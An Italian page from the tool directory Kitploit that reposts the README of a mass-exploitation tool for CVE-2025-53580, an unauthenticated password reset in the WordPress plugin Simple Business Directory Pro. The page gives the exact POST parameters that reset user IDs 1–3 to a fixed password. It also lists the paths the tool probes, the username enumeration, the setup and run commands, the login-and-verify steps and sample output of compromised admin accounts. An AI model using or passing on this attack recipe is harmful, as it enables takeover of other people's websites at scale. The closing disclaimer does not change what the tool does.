Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-53580 — WordPress Simple Business Directory Pro Plugin < 15.6.9 è vulnerabile a un'escalation dei privilegi ad alta priorità. | Kitploit
Strumenti/GitHubGitHub/nxploited/cve-2025-53580
Escalation di PrivilegiRicognizioneAttacchi alle PasswordAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebRaccolta InformazioniPenetration TestingApprendimento e Formazione
GitHubnxploited/cve-2025-53580

CVE-2025-53580

WordPress Simple Business Directory Pro Plugin < 15.6.9 è vulnerabile a un'escalation dei privilegi ad alta priorità.

44 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Vedi Repository

CVE-2025-53580

Il plugin WordPress Simple Business Directory Pro < 15.6.9 è vulnerabile a un'escalation di privilegi ad alta priorità

CVE-2025-53580

Simple Business Directory Pro — Assegnazione privilegi errata → Reset password → Compromissione admin

root@kitploit:~
   ___  _        ___     __  __  __  ____     ____ ___  ____ __   __
  / (_)(_|   |_// (_)   /  )/  \/  )|        |    /   \|    /  \ /  \
 |       |   |  \__       /|    | / |___     |___   __/|___ \__/|    |
 |       |   |  /   -----/ |    |/      \-----   \    \    \/  \|    |
  \___/   \_/   \___/   /___\__//___\___/    \___/\___/\___/\__/ \__/

CVE Plugin Auth Python Author


❶ Vulnerabilità

Causa principale:
Il plugin espone un modulo frontend di ripristino password (qcpd-restore-pwd) che accetta un qcpd-uid numerico (ID utente WordPress) e un nuovo valore pass. Prima della modifica della password non viene applicata alcuna autenticazione, token, nonce o verifica via email. Qualsiasi attaccante non autenticato può reimpostare la password dell'ID utente 1 (in genere l'amministratore del sito) e di qualsiasi altro utente inviando una singola richiesta POST, quindi autenticarsi con la password iniettata per ottenere pieno accesso amministrativo.


❷ Flusso dell'attacco

root@kitploit:~
┌─────────────────────────────────────────────────────────────────┐
│  1. Discover SBD restore page                                   │
│     Probe 24 candidate paths  →  match body containing "sbd"   │
│                                                                 │
│  2. Reset passwords by user ID                                  │
│     POST <restore_url>                                          │
│       qcpd-restore-pwd      = restore                           │
│       qcpd-restore-pwd-type = user                              │
│       qcpd-uid              = 1  (then 2, then 3)              │
│       pass                  = NxploitedNX                       │
│                                                                 │
│  3. Enumerate usernames                                         │
│     /?author=1..9   →  redirect / body parse                    │
│     /wp-json/wp/v2/users  →  slug / username fields            │
│     hostname heuristic  +  "admin" fallback                     │
│                                                                 │
│  4. Login with injected password                                │
│     POST /wp-login.php  log=<user>  pwd=NxploitedNX             │
│     Check: wordpress_logged_in cookie present                   │
│                                                                 │
│  5. Verify admin access (dual method)                           │
│     GET /wp-json/wp/v2/users/me  →  capabilities.manage_options│
│     GET /wp-admin/users.php      →  adminmenu / users table     │
│                                                                 │
│  6. Write confirmed hit → Nx_sbd_login_hits.txt                 │
└─────────────────────────────────────────────────────────────────┘

❸ Configurazione

root@kitploit:~
git clone https://github.com/Nxploited/CVE-2025-53580.git
cd CVE-2025-53580
pip install -r requirements.txt

requirements.txt

root@kitploit:~
requests>=2.28.0
urllib3>=1.26.0
colorama>=0.4.6

❹ Utilizzo

root@kitploit:~
python3 CVE-2025-53580.py

Prompt

root@kitploit:~
Targets list file (one host/URL per line) [list.txt]:   list.txt
Threads (concurrent sites) [3]:                         5
HTTP timeout (seconds) [10]:                            10
Successful hits file [Nx_sbd_login_hits.txt]:           Nx_sbd_login_hits.txt

La password iniettata per tutti i tentativi di reset è fissa internamente:

root@kitploit:~
NxploitedNX

ID utente presi di mira per sito: 1, 2, 3 (configurabili tramite MAX_USER_ID)


❺ Formato dei target — list.txt

root@kitploit:~
https://target1.com
target2.com
http://target3.com

❻ Pagine SBD candidate sondate

Lo strumento esegue la scansione di 24 percorsi per ogni target cercando una pagina il cui corpo contiene sbd:

root@kitploit:~
/login          /log-in         /signin         /sign-in
/user-login     /account/login  /restore        /password-reset
/reset-password /lost-password  /lostpassword   /user/restore
/my-account     /members/login  /member-login   /customer-login
/wp-login.php   /blog/login     /auth/login     /auth/restore
/sbd-login      /sbd-restore    /blog/log-in    /account/log-in

❼ Enumerazione dei nomi utente


❽ Verifica admin — doppio metodo

Ogni login riuscito viene verificato tramite due controlli indipendenti prima di essere scritto su disco:

Metodo 1 — REST API:

root@kitploit:~
GET /wp-json/wp/v2/users/me
→ capabilities.manage_options = true  →  ADMIN CONFIRMED

Metodo 2 — Dashboard:

root@kitploit:~
GET /wp-admin/users.php
→ adminmenu / users table markers present  →  ADMIN CONFIRMED

❾ File di output

Nx_sbd_login_hits.txt

root@kitploit:~
[2025-06-01 14:22:10] https://target.com - type=ADMIN - user=admin
- login=/wp-login.php user=admin pass=NxploitedNX
- detail=ADMIN_CONFIRMED_REST(manage_options)

[2025-06-01 14:23:05] https://target2.com - type=USER - user=editor
- login=/wp-login.php user=editor pass=NxploitedNX
- detail=not_admin(rest_no_manage_options, wpadmin_no_strong_markers)

❿ Esempio di output del terminale

root@kitploit:~
[info]  https://target.com :: starting
[ok]    https://target.com :: found front-end sbd page at https://target.com/my-account
[info]  https://target.com :: starting qcpd-uid=1..3 brute with pass=NxploitedNX
[info]  https://target.com :: POST uid=1 → status=302, Location=/my-account/?restored=1
[info]  https://target.com :: POST uid=2 → status=302, Location=/my-account/?restored=1
[info]  https://target.com :: extracting usernames and trying login
[ok]    https://target.com :: login OK for user='admin', checking admin...
[ok]    https://target.com :: HIT for user='admin' → admin=True,
        detail=ADMIN_CONFIRMED_REST(manage_options)

[warn]  https://target2.com :: no sbd page found in candidate restore paths, skipping

⓫ Autore

root@kitploit:~
Nxploited (Khaled Alenazi)
GitHub   →  https://github.com/Nxploited
Telegram →  @KNxploited

GitHub Telegram


⓬ Disclaimer

root@kitploit:~
SOLO PER RICERCA SULLA SICUREZZA E ISTRUZIONE AUTORIZZATE.

L'autore non si assume alcuna responsabilità per l'uso contro sistemi
di cui l'operatore non è proprietario o per i quali non ha esplicita autorizzazione scritta al test.

L'uso non autorizzato viola il CFAA, il CMA e le leggi equivalenti in tutto il mondo.
Sei il solo responsabile delle tue azioni.

© 2025 Nxploited · Simple Business Directory Pro < 15.6.9 · Corretto in 15.6.9

Scarica lo strumento
CampoDettaglio
CVECVE-2025-53580
Pluginquantumcloud Simple Business Directory Pro (simple-business-directory-pro)
Versioni interessateTutte le versioni < 15.6.9
AutenticazioneNon richiesta
TipoAssegnazione privilegi errata → Reset password non autenticato
CWECWE-266 · Assegnazione privilegi errata
MetodoEndpoint
Redirect autore/?author=1 → /?author=9
REST API/wp-json/wp/v2/users → slug + username
Euristica hostnamePrima etichetta del dominio
Fallback hardcodedadmin sempre incluso